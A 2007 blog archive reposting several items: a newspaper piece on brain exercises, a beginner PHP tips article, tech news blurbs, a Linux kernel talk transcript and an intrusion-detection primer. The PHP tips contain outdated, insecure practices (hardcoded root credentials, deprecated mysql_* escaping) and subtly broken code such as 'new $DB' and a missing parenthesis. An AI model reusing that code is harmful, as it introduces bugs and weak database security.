Tuesday, January 23, 2007

8 ways to exercise your brain

By DAWN SAGARIO
REGISTER STAFF WRITER
January 22, 2007






Add comment


 



MARK MARTURELLO/REGISTER ILLUSTRATION


There are some aspects of aging, such as gray hair, that Laura Bestler-Wilcox can accept.

Mental decline is not one of them.

"I'm only 38, but I have no intention of growing old - mentally, at least," said Bestler-Wilcox, from Ames.

She started playing Nintendo's Brain Age game last month, and says it helps keep her brain active. The goal is to score the ideal "brain age" of 20, which you achieve by doing a range of exercises - from math problems and counting the number of syllables in words, to reading aloud and Sudoku.

"I do math better," said Bestler-Wilcox, who plays the game every other day for about 20 minutes. "It's like doing exercises for different parts of your body. This is exercising your brain."

Staying mentally fit is a hot topic - from new research touting the benefits of mental exercises, to seminars on maintaining your brain health done by AARP and the Alzheimer's Association.

Two new studies, one done in Des Moines, show that brain workouts are beneficial for mental health, and can help improve brain function.

Brain health is an important issue among America's approximately 78 million baby boomers. The AARP Web site includes tips for a healthy brain, as well as brain puzzles. The organization conducted about 30 presentations nationwide on brain health last year, said Michael Patterson, manager of AARP's "Staying Sharp" program.

"People seem to be more willing to put up with physical decline, more than mental decline," Patterson said.

Here are eight ways people of all ages can keep mentally sharp.

1. PLAY HEAD GAMES

Brain games may help improve mental function, and could possibly help prevent dementia.

That's according to a six-month pilot study in Des Moines that included Alzheimer's patients.

Participants used the "Happy Neuron" software (www.happyneuron.com), said geriatrician Dr. Robert Bender, who led the research team. The activities targeted language, visual-spatial and memorization skills.

The findings were released earlier this month.

The games seem to help overall brain health, said Bender, medical director of the Orr Center for Memory and Healthy Aging in West Des Moines. Researchers don't know yet whether doing the exercises can definitely prevent diseases like Alzheimer's.

"The challenge is to stretch yourself, at the same time without making it frustrating," Bender said. "At all ages, we need to challenge our brain to learn new things, and that's the main thing."

The study's "brain wellness program" also included: consistent social interaction, physical exercise, a low-fat diet, stress management and meditation.

Caregivers also participated in the study, funded by the Centers for Disease Control and Prevention.

2. TRAIN YOUR BRAIN

Brain training can help ease daily tasks. Seniors who did certain mental exercises improved their thinking skills, according to a recent study.

They also had an easier time performing everyday tasks, even five years after receiving training, compared to untrained people.

The difference was significant for people who had reasoning training, said Michael Marsiske, one of the principal investigators of the study.

The study included 2,802 adults age 65 and older who were living independently and had normal brain function.

The training exercises included:

- Memory: To help people memorize word lists, one method was to organize a grocery list by the sections of the store, said Marsiske, an associate professor in the department of clinical health and psychology at the University of Florida.

- Visualization: Use all your senses to remember things. For example, if you need to remember a dog's name, visualize what the dog's fur feels like, recall the sound of its bark, and, yes, try to re-create its smell.

- Reasoning: Participants learned to use highlighters to identify key points in complicated information. That included underlining important information like dosage and frequency on a medication.

3. TAXES

Don Eller of Urbandale says he stays sharp by volunteering to do people's taxes as part of a program run by AARP.

"In preparation to do that, there are tax classes you attend," said Eller, 76. "So you are continuing working with numbers and math concepts."

During the off-season, he likes to play Sudoku online. He also tries to take daily walks, and on most days walks about three miles.

Marsiske recommends taxpayers take a crack at those pesky forms and complicated columns of numbers before handing them off to professionals. It's just one way to flex your mental brawn.

"That's where you're engaging your mental activity," Marsiske said.

Another simple numbers tip: Figure out the calculations yourself, first, before breaking out the calculator.

4. BUILD YOUR "COGNITIVE RESERVE"

There's a whole new body of research showing that individuals with a lot of education, highly challenging jobs, and who are very socially engaged have the highest levels of mental function and the lowest levels of decline later in life, Marsiske said.

"If we do things to produce healthy brains early in life, then we will benefit from that later in life," he said.

5. REMEMBER PASSWORDS

Keep track of your passwords - without the help of your computer. This is Marsiske's trick: "I never let my computer remember any passwords," he said. He writes them down in a hidden spot, in a hidden code. "What I want to do is engage in that act of having to remember."

6. RETHINK YOUR CROSSWORD PUZZLE

Remember that you want to find activities that test your mental mettle. One danger with crossword puzzles, Bender said, is that people who regularly do them may already be familiar with the vocabulary. Avoid slipping into the familiar, and try something new.

7. APRENDER EL ESPAÑOL

Translation: Learn Spanish, or another new language or mechanical skill. "It's important to find things that we enjoy because that lowers stress and that helps the brain work better," Bender said.

8. EXERCISE YOUR BODY

What's good for the body is good for the brain. More research is confirming that exercise, diet, a healthy lifestyle and getting an adequate amount of sleep not only keep you physically healthy, but also mentally, Marsiske said.

Reporter Dawn Sagario can be reached at (515) 284-8351 or dsagario@dmreg.com

Monday, January 22, 2007

10 Tips That Every PHP Newbie Should Know

I wish I had known these 10 tips the day I started working with PHP. Instead of learning them through painstaking process, I could have been on my way to becoming a PHP programmer even sooner! This article is presented in two parts and is intended for folks who are new to PHP.
Tip 1: MySQL Connection Class
The majority of web applications I've worked with over the past year have used some variation of this connection class:

class DB {
function DB() {
$this->host = "localhost"; // your host
$this->db = "myDatabase"; // your database
$this->user = "root"; // your username
$this->pass = "mysql"; // your password

$this->link = mysql_connect($this->host, $this->user,
$this->pass);
mysql_select_db($this->db);
}
}

// calls it to action
$db = new $DB;

Simply edit the variables and include this in your files. This doesn't require any knowledge or special understanding to use. Once you've added it to your repertoire, you won't likely need to create a new connection class any time soon. Now you can get to work and quickly connect to your database without a lot of extra markup:

$result = mysql_query("SELECT * FROM table ORDER BY id ASC LIMIT 0,10");

More information can be found in the manual--be sure you read the comments: http://www.php.net/mysql_connect/
Tip 2: Dealing with Magic Quotes
PHP "automagically" can apply slashes to your $_POST data for security purposes. It's an important measure to prevent SQL injections. However, slashes in your scripts can wreak havoc. This is an easy method for dealing with them. The way to handle the slashes is to strip them from our variables. However, what if the magic quotes directive is not enabled?

function magicQuotes($post) {

if (get_magic_quotes_gpc()) {
if (is_array($post) {
return array_map('stripslashes',$post);
} else {
return stripslashes($post);
}
} else {
return; // magic quotes are not ON so we do nothing
}

}

The script above checks to see if magic quotes is enabled. If they are, it will determine if your $_POST data is an array (which it likely is) and then it will strip the slashes accordingly.
Understand that this is not true 'validation'. Be sure to validate all your user-submitted data with regular expressions (which is the most common way to do so).
More information about magic quotes: http://www.php.net/ magic_quotes/
More information about SQL injection: http://www.php.net/manual/en/security.database.sql-injection.php/
More information about regular expressions: http://www.php.net/pcre/
Tip 3: Safely Query Database with mysql_real_escape_string
When you are ready to query your database you will need to escape special characters (quotes for instance) for safety's sake by adding slashes. We apply these before we insert variables into our database. Once again, we need to determine which version of PHP you are running first:

function escapeString($post) {

if (phpversion() >= '4.3.0') {
return array_map('mysql_real_escape_string',$post);
} else {
return array_map('mysql_escape_string',$post);
}

}

More information about mysql_real_escape_string: http://www.php.net/ mysql_real_escape_string/
More information about SQL injection: http://php.belnet.be/manual/en/security.database.sql- injection.php
Tip 4: Debugging
If you search the forum there are many good threads with rules about debugging. The single most important thing you can do is ask PHP to report errors and notices to you by adding this line at the beginning of your scripts:

error_reporting(E_ALL);

This will keep you in line as you learn by printing out errors to your screen. The most common error that E_ALL reports is not actually an error, but a notice for an "Undefined index". Typically, it means that you have not properly set your variable. It's easy to fix and keeps you programming correctly.
Another convenient tool while working with queries is print_r(). If your query is returning null or strange results, simply place this after your query command and it will display all the contents of the $result array.

print_r($result); exit;

The exit command stops your script from executing any further so you can specifically review your query results.
More information about error_reporting: http://www.php.net/ error_reporting/
More information about print_r; http://www.php.net/print_r/
Tip 5: Writing Functions (and Classes)
Initially I thought that tackling functions and classes would be difficult--thankfully I was wrong. Writing a function is something I urge all newbies to start doing immediately--it's really that simple. You are instantly involved in understanding how to produce more efficient code in smaller pieces. Where you might have a line of code that reads like this:

if ($rs['prefix'] == 1) {
$prfx = 'Mrs. ';
} elseif ($rs['prefix'] == 2) {
$prfx = 'Ms. ';
} else {
$prfx = 'Mr. ';
}

echo $prfx.$rs['name'].' '.$rs['last_name'];

You could rewrite it like this in a function:

function makePrefix($prefix='')
{
if (!$prefix) return '';
if ($prefix == 1) return 'Mrs. ';
if ($prefix == 2) return 'Ms. ';
if ($prefix == 3) return 'Mr. ';
}

echo makePrefix($rs['prefix']) . $rs['name'] . ' ' . $rs['last_name'];

Now that you've written this function, you can use it in many different projects!
An easy way to describe classes is to think of it as a collection of functions that work together. Writing a good class requires an understanding of PHP 5's new OOP structure, but by writing functions you are well on your way to some of the greater powers of PHP.
More information about writing functions: http:// www.php.net/manual/en/language.functions.php
More information about writing classes: http:// www.php.net/manual/en/language.oop5.php
Everything I've learned, more or less, came from the manual, trial and error and great help from the many fine people here at PHPBuilder. Good luck programming--and come back soon for Part 2 in this series!

The Anatomy of Pump N' Dump Stock Spamming

"Laura Frieder and Jonathan Zittrain have analyzed pump n' dump spam activity in their paper 'Spam Works: Evidence from Stock Touts and Corresponding Market Activity'. Unbelievably, it appears that spammers are able to achieve a 5% gain on pumped stock before dumping it, along with a dramatic increase in transaction volume of the stock. From the synopsis: ' We suggest that the effectiveness of spammed stock touting calls into question prevailing models of securities regulation that rely principally on the proper labeling of information and disclosure of conflicts of interest to protect consumers, and we propose several regulatory and industry interventions. Based on a large sample of touted stocks listed on the Pink Sheets quotation system, we find that stocks experience a significantly positive return on days prior to heavy touting via spam. Volume of trading responds positively and significantly to heavy touting.'"

Google, Microsoft Escalate Data Center Battle

"The race by Microsoft and Google to build next-generation data centers is intensifying. On Thursday Microsoft announced a $550 million San Antonio project, only to have Google confirm plans for a $600 million site in North Carolina. It appears Google may just be getting started, as it is apparently planning two more enormous data centers in South Carolina, which may cost another $950 million. These 'Death Star' data centers are emerging as a key assets in the competitive struggle between Microsoft and Google, which have both scaled up their spending (as previously discussed on Slashdot). Some pundits, like PBS' Robert X. Cringley, say the scope and cost of these projects reflect the immense scale of Google's ambitions."

Myths, Lies, and Truths about the Linux kernel

slide 00
Hi, as Dave said, I'm Greg, and I've been given the time by the people at OLS to talk to you for a bit about kernel stuff. I'm going to discuss the a number of different lies that people always say about the kernel and try to debunk them; go over a few truths that aren't commonly known, and discuss some myths that I hear repeated a lot.

Now when I mean a myth, I'm referring to something that was believed to have some truth to them, but when you really examine them, they are fictional. Let's call them the "urban myths" of the Linux kernel.

So, to start, let's look at a very common myth that really annoys me a lot:

slide 01
Now I know that almost everyone involved in Linux has heard something like this in the past. About how Linux lacks device support, or really needs to support more hardware, or how we are lagging in the whole area of drivers. I've seen almost this same kind of quote from someone at OSDL a few months back, in my local paper, and it's extreme annoying.

This is really a myth, so people should really know better these days about saying this. So, who said this specific quote?:

slide 02
Ick.

Ok, well, he probably said this a long time ago, back when Linux really didn't support many different things, and when "Plug & Play" was a big deal with ISA buses and stuff:

slide 03
Ugh.

Ok, so maybe I need to spend some time and really debunk this myth as it really isn't true anymore.

So, what is the fact concerning Linux and devices these days. It's this:

slide 04
Yes, that's right, we support more things than anyone else. And more than anyone else ever has in the past. Linux has a very long list of things that we have supported before anyone else ever did. That includes such things as:

  • USB 2.0

  • Bluetooth

  • PCI Hotplug

  • CPU Hotplug

  • memory Hotplug (ok, some of the older Unixes did support CPU and memory hotplug in the past, but no desktop OS still supports this.)

  • wireless USB

  • ExpressCard


and the list can go on, the embedded arena is especially full of drivers that no one else supports.

But there's a real big part of the whole hardware support issue that goes beyond just specific drivers, and that's this:

slide 05
Yes, we passed the NetBSD people a few years ago in the number of different processor families and types that we support now. No other "major" operating system even comes remotely close in platform support for what we have in Linux. Linux now runs in everything from a cellphone, to a radio controlled helicopter, your desktop, a server on the internet, on up to a huge 73% of the TOP500 largest supercomputers in the world.

And remember, almost every different driver that we support, runs on every one of those different platforms. This is something that no one else has ever done in the history of computing. It's just amazing at how flexible and how powerful Linux is this way.

We now have the most scalable and most supported operating system that has ever been created. We have achieved something that is so unique and different and flexible that for people to keep repeating the "Linux doesn't support hardware" myth, is something that everyone needs to stop repeating. As it simply isn't true anymore.

Now, to be fair to Jeff Jaffe, when he said that original quote, he had just become the CTO of Novell, and didn't really have much recent experience with Linux, and did not realize the real state of device support that the modern distros now provide.

Look at the latest versions of Fedora, SuSE, Ubuntu and others. Installation is a complete breeze (way easier than any other operating system installation). You can now plug a new device in and the correct driver is automatically loaded, no need to hunt for a driver disk somewhere, and you are up and running with no need to even reboot.

An example of this, I recently plugged a new USB printer into my laptop, and a dialog box popped up and asked me if I wanted to print a test page on it. That's it, nothing else. If that isn't "plug and play", I really don't know what is.

But not everyone has been ignoring the success of Linux, as is obvious by the size of this conference. Lots of people see Linux and want to use it for their needs, but when they start looking deeper into the kernel, and how it is developed almost the first thing they run into is the total lack of a plan:

slide 06
This lots of people absolutely crazy all the time. You see questions like "Linux has no roadmap so how can I create a product with it", and "How does anyone get anything done since no one is directing anyone", and other things like this.

Well, obviously based on the fact that we are successful at doing something that's never been done before, we must have got here somehow, and be doing something right, but what is it?

Traditionally software is created by determining the requirements for it, writing up a big specification document, reviewing it and getting everyone to agree on it, implement the spec, test it, and so on. In college they teach software engineering methodology like the waterfall method, the iterative process method, formal proof methods, and others. Then there's the new ways of creating programs like extreme programming and top-down design, and so on.

So, what do we do here in the kernel?

slide 07
Dr. Baba studies how businesses work and came to this conclusion after researching how the open source community works and specifically how the Linux kernel is developed and managed.

I guess it makes sense that since we have now created something that has never been done before, we did it by doing something different than anyone else. So, what is it? How is the kernel designed and created? Linus answered this question last year when he said the following to a group of companies when he was asked to explain the kernel design process:

slide 08
This is a really important point that a lot of people don't seem to understand. Actually, I think they understand it, they just really don't like it.

The kernel is not developed with big design documents, feature requests and so on. It evolves over time based on the need at the moment for it. When it first started out, it only supported one type of processor, as that's all it needed to. Later, a second architecture was added, and then more and more as time went on. And each time we added a new architecture, the developers figured out only what was needed to support that specific architecture, and did the work for that. They didn't do the work in the very beginning to allow for the incredible flexibility of different processor types that we have now, as they didn't know what was going to be needed.

The kernel only changes when it needs to, in ways that it needs to change. It has been scaled down to tiny little processors when that need came about, and was scaled way up when other people wanted to do that. And every time that happened, the code was merged back into the tree to let everyone else benefit from the changes, as that's the license that the kernel is released under.

Jonathan on the first day of the conference showed you the huge rate of change that the kernel is under. Tons of new features are added at a gigantic rate, along with bug fixes and other things like cleanups. This shows how fast the kernel is still evolving, almost 15 years after it was created. It's morphed into this thing that is very adaptable and looks almost nothing like what it was even a few years ago. And that's the big reason why Linux is so successful, and why it will keep being successful. It's because we embrace change, and love it, and welcome it.

But one "problem" for a lot of people is that due to this constantly evolving state, the Linux kernel doesn't provide some things that "traditional" operating systems do. Things like an in-kernel stable API. Everyone has heard this one before:

slide 09
For those of you who don't know what an API is, it is the description of how the kernel talks within itself to get things done. It describes things like what the specific functions are that are needed to do a specific task, and how those functions are called.

For Linux, we don't have a stable internal api, and for people to wish that we would have one is just foolish. Almost two years ago, the kernel developers sat down and wrote why Linux doesn't have an in-kernel stable API and published it within the kernel in the file:

slide 10
If you have any questions please go read this file. It explains why Linux doesn't have a stable in-kernel api, and why it never will. It all goes back to the evolution thing. If we were to freeze how the kernel works internally, we would not be able to evolve in ways that we need to do so.

Here's an example that shows how this all works. The Linux USB code has been rewritten at least three times. We've done this over time in order to handle things that we didn't originally need to handle, like high speed devices, and just because we learned the problems of our first design, and to fix bugs and security issues. Each time we made changes in our api, we updated all of the kernel drivers that used the apis, so nothing would break. And we deleted the old functions as they were no longer needed, and did things wrong. Because of this, Linux now has the fastest USB bus speeds when you test out all of the different operating systems. We max out the hardware as fast as it can go, and you can do this from simple userspace programs, no fancy kernel driver work is needed.

Now Windows has also rewritten their USB stack at least 3 times, with Vista, it might be 4 times, I haven't taken a look at it yet. But each time they did a rework, and added new functions and fixed up older ones, they had to keep the old api functions around, as they have taken the stance that they can not break backward compatibility due to their stable API viewpoint. They also don't have access to the code in all of the different drivers, so they can't fix them up. So now the Windows core has all 3 sets of API functions in it, as they can't delete things. That means they maintain the old functions, and have to keep them in memory all the time, and it takes up engineering time to handle all of this extra complexity. That's their business decision to do this, and that's fine, but with Linux, we didn't make that decision, and it helps us remain a lot smaller, more stable, and more secure.

And by secure, I really mean it. A lot of times a security problem will be found in one driver, or in one core part of the kernel, and the kernel developers fix it, and then go and fix it up in all other drivers that have the same problem. Then, when the fix is released, all users of all drivers are now secure. When other operating systems don't have all of the drivers in their tree, if they fix a security problem, it's up to the individual companies to update their drivers and fix the problem too. And that rarely happens. So people who buy the device, and then use the older driver that comes in the box with the device, which is insecure. This has happened a lot recently, and really shows how having a stable api can actually hurt end users, when the original goal was to help developers.

What usually happens after I talk to people about the instability of the kernel api, and how kernel development works, they usually respond with:

slide 11
This just is not true at all. We have a whole sub-architecture that only has 2 users in the world out there. We have drivers that I know have only one user, as there was only one piece of hardware ever made for it. It just isn't true, we will take drivers for anything into our tree, as we really want it.

We want more drivers, no matter how "obscure", because it allows us to see patterns in the code, and realize how we could do things better. If we see a few drivers doing the same thing, we usually take that common code and move it into a shared piece of code, making the individual drivers smaller, and usually fixing things up nicer. We also have merged entire drivers together because they do almost the same thing. An example of this is a USB data acquisition driver that we have in the kernel. There are loads of different USB data acquisition devices out in the world, and one German company send me a driver a while ago to support their devices. It turns out that I was working on a separate driver for a different company that did much the same thing. So, we worked together and merged the two together, and we now have a smaller kernel. That one driver turned out to work for a few other company's devices too, so they simply had to add their device id to the driver and never had to write any new code to get full Linux support. The original German company is happy as their devices are fully supported, which is what their customers wanted, and all of the other companies are very happy, as they really didn't have to do any extra work at all. Everyone wins.

The second thing that people ask me about when it comes to getting code into the kernel is, well, we want to keep our code private, because it is proprietary.

So, here's the simple answer to this issue:

slide 12
That's it, it is very simple. I've had the misfortune of talking to a lot of different IP lawyers over the years about this topic, and every one that I've talked to all agree that there is no way that anyone can create a Linux kernel module, today, that can be closed source. It just violates the GPL due to fun things like derivative works and linking and other stuff. Again, it's very simple.

Now no lawyer will ever come out in public and say this, as lawyer really aren't allowed to make public statements like this at all. But if you hire one, and talk to them in the client/lawyer setting, they will advise you of this issue.

I'm not a lawyer, nor do I want to be one, so don't ask me anything else about this, please. If you have legal questions about license issues, talk to a lawyer, never bring it up on a public mailing list like linux-kernel, which only has programmers. To ask programmers to give legal rulings, in public, is the same as asking us for medical advice. It doesn't make sense at all.

But what would happen if one day the Linux kernel developers suddenly decided to let closed source modules into the kernel? How would that affect how the kernel works and evolves over time?

It turns out that Arjan van de Ven has written up a great thought exercise detailing exactly what would happen if this came true:

slide 13
In his article, which can be found in the linux-kernel archives really easily, he described how only the big distros, Novell and Red Hat, would be able to support any new hardware that came out, but would slowly stagnate as they would not be allowed to change anything that might break the different closed source drivers. And then, if you loaded more than one closed source module, support for your system would pretty much be impossible. Even today, this is easily seen if you try to load more than one closed source module into your system, if anything goes wrong, no company will be willing to support your problem.

The article goes on to show how the community based distros, like Gentoo and Debian, would slowly become obsolete and not work on any new hardware platforms, and dry up as no users would be able to use them anymore. And eventually, in just a few short years, the whole kernel project itself would come to a standstill, unable to innovate or change anything.

It's a really chilling tale, and quite good, please go look it up if you are interested in this topic.

But there's one more aspect of the whole closed source module issue that I really want to bring up, and one that most people ignore. It's this:

slide 14
Remember, no one forces anyone to use Linux. If you don't want to create a Linux kernel module, you don't have to. But if your customers are demanding it, and you decide to do it, you have to play by the rules of the kernel. It's that simple.

And the rule of the kernel is the GPL, it's a simple license, with standard copyright ownership issues, and many lawyers understand it.

When a company says that they need to "protect their intellectual property", that's fine, I and no other kernel developer has any objection to that. But by the same token, you need to respect the kernel developers intellectual property rights. We released our code under the GPL, which states in very specific form, exactly what your rights are when using this code. When you link other code into our body of code, you are obligated by the license of the kernel to also release your code under the same license (when you distribute it.)

When you take the Linux kernel code, and link or build with the header files against it, with your code, and not abide by the well documented license of our code, you are saying that for some reason your code is much more important than the entire rest of the kernel. In short, you are giving every kernel developer who has ever released their code the finger.

So remember, the individual companies are not more important than the kernel, for without the kernel development community, the companies would have no kernel to use at all. Andrew Morton stood up here two years ago and called companies who create closed source modules leaches. I completely agree. What they do is just totally unethical. Some companies try to skirt the license of the law on how they redistribute their closed source code, forcing the end user of it to do the building and linking, which then causes them to violate the GPL if they want to give that prebuilt module to anyone else. These companies are just plain unethical and wrong.

Luckily people are really starting to realize this and the big distros are not accepting this anymore. Here's what Novell publicly stated earlier this year:

slide 15
This means that SuSE 10.1, and SLES and SLED 10 will not have any closed source kernel modules in it at all. This is a very good thing.

Red Hat also includes some text like this in their kernel package, but hasn't come out and said such a public statement.

Alright, enough depressing stuff. After companies realize that the really need to get their code into the kernel tree, they quickly run into one big problem:

slide 16
This really isn't as tough of a problem as it first looks. Remember, the rate of change is about 6000 different patches a kernel release, so some one is getting their code into the tree.

So, how to do it. Luckily, the kernel developers have written down everything that you need to know for how to do kernel development. It's all in one file:

slide 17
Please, point this file out to anyone who has questions on how to do kernel development. It answers about everything that anyone has ever asked, and points people at other places where the answers can be found.

It talks about how the kernel is developed, how to create a patch, how to find your way around the kernel tree, who to send patches to, what the different kernel trees are all about, and it even lists things you should never say on the linux-kernel mailing list if you expect people to take your code seriously.

It's a great file, and if you ever have anything that it doesn't help you out with, please let the author of that file know and they will work to add it. It should be the thing that you give to any manager or developer if they want to learn more about how to get their code into the kernel tree.

One thing that the HOWTO file describes, is various communities that can help people out with kernel development. If you are new to kernel development, there is the:

slide 18
project. This is a very good wiki, a very nice and tame mailing list where you can ask basic questions without feeling bad, and there's also an IRC channel where you can ask questions in realtime to a lot of different kernel developers. If you are just starting out, please go here, it's a very good place to learn.

If you really want to start out doing kernel development, but don't know what to do, the:

slide 19
project is an excellent place to start. They keep a long list of different "janitorial" tasks that the kernel developers have said it would be good to have done to the code base. You can pick from them, and learn the basics of how to create a patch, how to fix your email client to send a proper patch, and then, you get to see your name in the kernel changelog when your patches go in.

I really recommend this project for anyone who wants to start kernel development, but hasn't found anything specific to work on yet. It gets you to search around the kernel tree, fixing up odd things, and by doing that, you will usually find something that interests you that no one else is doing, and you can slowly start to take that portion of the kernel over. I can't recommend this group enough.

And then, there's the big huge mailing list, where everyone lives on:

slide 20
This list gets about 200 emails a day to it, and can be hugely daunting to anyone trying to read it. Here's a hint, almost no one, except Andrew Morton, reads all of the emails on it. The rest of us just use filters, and read the things that interest them. I really suggest just finding some developers that you know provide interesting commentary, and reading the threads they respond to. Or just search for subjects that look interesting. But don't try to read everything, you'll just never get any other work done if you do that.

The Linux kernel mailing list also has another kind of perceived problem. Lots of people can find the reaction of developers on this list as very "harsh" at times. They post their code, and get back scathing reviews of everything they did wrong. Usually the reviewers only criticize the code itself, but for most people, this can be a very hard thing to be on the receiving end of. They just put out what they felt was a perfect thing, only to see it cut into a zillion tiny pieces.

The big problem of this, is we really only have a very small group of people reviewing code in the kernel community. Reviewing code is a hard, unrewarding, tough thing to do. It really makes you grumpy and rude in a very short period of time. I tried it out for a whole week, and at the end of it, I was writing emails like this one:

slide 21
Other people who review code, aren't even as nice as I was here.

I'd like to publicly thank Christoph Hellwig and Randy Dunlap. Both of them spend a lot of time reviewing code on the linux-kernel mailing list, and Christoph especially has a very bad reputation for it. Bad in that people don't like his reviews. But the other kernel developers really do, because he is right. If he tells you something is wrong, and you need to fix it, do it. Don't ignore advice, because everyone else is watching to see if you really do fix up your code as asked to. We need more Christophs in the kernel community.

If everyone could take a few hours a week and review the different patches sent to the mailing list, it would be a great thing. Even if you don't feel like you are a very good developer, read other people's code and ask questions about it. If they can't defend their design and code, then there's something really wrong.

It's also a great way to learn more about programming and the kernel. When you are learning to play an instrument, you don't start out writing full symphonies on your own, you spend years reading other peoples scores, and learning how things are put together and work and interact. Only later do you start writing your own music, small tunes, and then, if you want, working up to bigger pieces. The same goes for programming. You can learn a lot from reading and understanding other people's code. Study the things posted, and ask why things are done specific ways, and point out problems that you have noticed. It's a task that the kernel really needs help with right now.

(possible side story about the quote)

Alright, but what if you want to help out with the kernel, but you aren't a programmer. What can you do? Last year Dave Jones told everyone that the kernel was going to pieces, with loads of bugs being found and no end in sight. A number of people made the response:

slide 22
Now, this is true, it would be great to have a simple set of tests that everyone could run for every release to ensure that nothing was broken and that everything's just right. But unfortunately, we don't have such a test suite just yet. The only set of real tests we have, is for everyone to run the kernel on their machines, and to let us know if it works for them.

So, that's what I suggest for people who want to help out, yet are not programmers. Please, run the nightly snapshots from Linus's kernel tree on your machine, and complain loudly if something breaks. If no one pays attention, complain again. Be really persistent. File bugs in:

slide 23
People do track things there. Sometimes it doesn't feel like it, but again, be persistent. If someone keeps complaining about something, we do feel bad, and work to try to fix things. Don't feel bad about being a pest, because we need more pests to keep all of us kernel developers in line.

And if you really feel brave, please, run Andrew Morton's -mm kernel tree. It contains all of the different kernel maintainer's development trees combined into one big mass of instability. It is the proving ground for what will eventually go into Linus's kernel tree. So we need people testing this kernel out to report problems early, before they go into Linus's tree.

I wouldn't recommend running Andrew's kernels on a machine with data that you care about, that would not be wise. So if you have a spare machine, or you have a very good backup policy, please, run his kernels and let us know if you have any problems with stuff.

So finally, in conclusion, here's the main things that I hope people remember:

slide 24
slide 25
slide 26
slide 27
slide 28
slide 29

What is IDS?

IDS is an acronym for Intrusion Detection System. An intrusion detection system detects intruders; that is, unexpected, unwanted or unauthorized people or programs on my computer network.

Why do I need IDS? A network firewall will keep the bad guys off my network, right? And my anti-virus will recognize and get rid of any virus I might catch, right? And my password-protected access control will stop the office cleaner trawling through my network after I've gone home, right? So that's it - I'm fully protected, right?

Wrong!

A firewall has got holes to let things through: without it, you wouldn't be able to access the Internet or send or receive emails. Anti-virus systems are only good at detecting viruses they already know about. And passwords can be hacked, stolen or left lying about on post-its.

That's the problem. You can have all this security, and all you've really got is a false sense of security. If anything or anyone does get through these defenses, through the legitimate holes, it or they can live on your network, doing whatever they want for as long as they want. And then there's a whole raft of little known vulnerabilities, known to the criminals, who can exploit them and gain access for fun, profit or malevolence. A hacker will quietly change your system and leave a back door so that he can come and go undetected whenever he wants. A Trojan might be designed to hide itself, silently gather sensitive information and secretly mail it back to source. And you won't even know it's happening - worse, you'll believe it can't be happening because you've got a firewall, anti-virus and access control.

Unless, that is, you also have an intrusion detection system. While those other defenses are there to stop bad things getting onto your network, an intrusion detection system is there to find and defeat anything that might just slip through and already be on your system. And in today's world, you really must assume that things will slip through - because they most certainly will. From the outside, you will be threatened by indiscriminate virus storms; from hackers doing it for fun (or training); and more worryingly from organized criminals specifically targeting you for extortion, blackmail or saleable trade secrets.

From the inside, you will have walk-in criminals using social engineering skills to obtain passwords to, or even use of, your own PCs; from curious staff who simply want to see what their colleagues are earning; and from malcontents with a grievance.

What you really mustn't assume is that this is fanciful, or that you don't have anything worth stealing. According to experts in the field even something as basic as stored HR data on your employees is worth $10 per person on the black market. Search for 'FBI' on this site, and see the variety of attacks and dangers that exist; and how often there is a degree of success despite firewalls and anti-virus and access control. You still need all of those defenses - but you also need an intrusion detection system.
What do I need in IDS?

Intrusion detection describes the intention - not the methodology. There are several different ways by which this can be achieved; so anything that detects intrusions is an IDS. Which method you choose really depends upon what you need: and if you don't already have in-house security expertise, it would be worth employing a consultant to help reach your decision.

Note that IDS is no longer a new technology - it's a mature technology. Since the term is no longer new, it no longer has that 'buzz' required by marketing managers. This has been aggravated by analyst firm the Gartner Group proclaiming that IDS is dead and replaced by IPS. This is wrong. Ignore it. IPS is different to IDS. Vend ors and security experts know this, but the result is that manufacturers are tempted to find new terms - and one of these is Network Behavior Analysis. This is a good and useful approach; but one of the primary purposes of NBA is to detect intrusions – in other words, IDS.

Remember, too, that good security is the right level of security for you. You need to strike the right balance between the cost of the security and the value of your goods - there's no point in spending more on security than the value of what you're protecting. Risk management principles using a thorough risk analysis will help you decide how much to spend.

Armed with this information, you can look for features such as:

* attack halting (stops the attack, whether it is a program or a hacker)
* attack blocking (closes the loop-hole through which the attacker gained access)
* attack alerting (either pop-up to an online admin, or email or SMS to a remote admin)
* information collecting (on what is done by the attack to the network, and from where the attack came - helps gather forensic evidence should a prosecution become necessary or possible)
* full reporting (so that you can learn from your mistakes, and prevent future problems)
* fail-safe features (such as encrypted messages and VPN tunneling within the IDS to hide its presence from, and inhibit interference by, any hacker).

If you've got a large network, or particularly valuable information, you may like to look out for the extras offered with some intrusion detection systems:

* honeypot or padded cell (a fake network or area designed specifically to attract and contain attacks, so that you can analyze them and learn from their behavior)
* vulnerability analysis (so that you can check your network for all known vulnerabilities in order to pre-empt rather than just detect intrusions)
* file integrity checker (a mathematical way of knowing if a file has been altered in any way, and therefore potentially compromised by an intruder)

One other point - don't think that you're so small you don't need or can't find an IDS. IDS as described above is available for large enterprises on down. But even if you just have a couple of PCs, you can still get, and still need, an intrusion detection system. It's just that for a single desktop system it goes by different names and has less automated features: it's a personal firewall and an anti-spyware program. The purpose is the same - to detect and stop intrusions - it's just that here you have to manually keep it up to date and manually conduct regular scans and it isn’t as intelligent or sophisticated.
Where do I get IDS?

Here are a few suppliers to get you started - but keep checking back to this resource center, because we'll be adding more companies and more products all the time:

* AirDefense
* Arbor Networks
* CounterStorm
* Enterasys
* GFI
* ISS
* Lancope
* Snort
* SonicWALL
* StillSecure

It will also be worth looking at Unified Threat Management. This is often a physical device, an appliance, and it just means that you get more than one security feature in a single box. Unified Threat Management will frequently include an IDS.
How can I evaluate IDS?

The first thing you need to do is to make sure that you know what you need, and what you can afford. Then you need to know what's available. Only then can you decide what to get. So first check the Buyer's Guide in this resource centre to see what you can get. Conduct a risk analysis exercise - use a consultant if you need to. And then, knowing what is available and what you need, consult our Comparison Guide and see what product comes closest to that need. And if you have specific queries, problems or worries - get some free help and advice from Ask the Experts .

Google Working To Make 'iPod/iTunes for Books'

nettamere writes to mention an initiative by Google to take the library online. The end result of the Google Book Search, the company hopes to see a future where they are not mearly referring customers to Amazon, but instead offering them the ability to download books directly. According to the Times Online, Google hopes to 'do for books what the iPod did for music'. From the article: "One of Google's partners, Evan Schnittman of Oxford University Press, said he foresaw a number of categories becoming popular downloads: 'Do you really want to go on holiday carrying four novels and a guide book?' The book initiative would be part of Google's Book Search service and its partnership with publishers, which will make books searchable online with publishers' approval. At present, only a sample of each book is available online."

Sunday, January 21, 2007

Linus Torvalds

By giving away his software, the Finnish programmer earned a place in history

By PETER GUMBEL

